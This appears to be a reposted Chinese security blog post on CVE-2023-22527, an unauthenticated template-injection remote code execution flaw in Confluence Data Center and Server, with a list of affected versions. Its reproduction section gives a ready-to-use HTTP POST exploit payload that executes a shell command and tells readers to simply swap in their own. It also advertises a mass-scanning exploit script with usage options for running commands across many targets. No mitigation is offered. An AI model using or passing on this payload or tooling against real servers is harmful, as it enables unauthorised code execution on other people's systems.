Confluence是一款建基于网络企业维基 (collaboration software) 的软件,由澳洲软件公司艾特莱森Atlassian所开发。是专业的企业知识管理与协同软件,强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence 独立软件内建Tomcat网页浏览器与hsql数据库,同时也支持其它数据库。Confluence已整合为群组软件的一部分,可以搭配JIRA或其他艾特莱森软件产品,包括 Bamboo, Clover,Crowd, Crucible,和Fisheye 使用。
CVE-2023-22527
漏洞描述:
旧版本 Confluence Data Center 和 Server 的text-inline.vm处存在模板注入,攻击者无需身份验证即可利用此漏洞构造远程代码执行。
影响版本:
Confluence Data Center and Server 8.0.xConfluence Data Center and Server 8.1.xConfluence Data Center and Server 8.2.xConfluence Data Center and Server 8.3.xConfluence Data Center and Server 8.4.x8.5.0 <= Confluence Data Center and Server <= 8.5.3
漏洞复现:
直接改命令就行
POST /template/aui/text-inline.vm HTTP/1.1Host:xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/115.0.0.0 Iron Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 368Connection: closelabel=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
批量扫描脚本:
所有非法攻击本人概不负责
https://github.com/YongYe-Security/CVE-2023-22527usage: python3 CVE-2023-22527.py -u <target> [-f <file>] -c <cmd>options:-h, --help show this help message and exit-u TARGET, --target TARGETTarget URL-f FILE, --file FILE URL file-c CMD, --cmd CMD Commands to execute-t THREAD, --thread THREADNumber of threads
原文始发于微信公众号(YongYe 安全实验室):CVE-2023-22527__Confluence-RCE 附批量扫描脚本
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论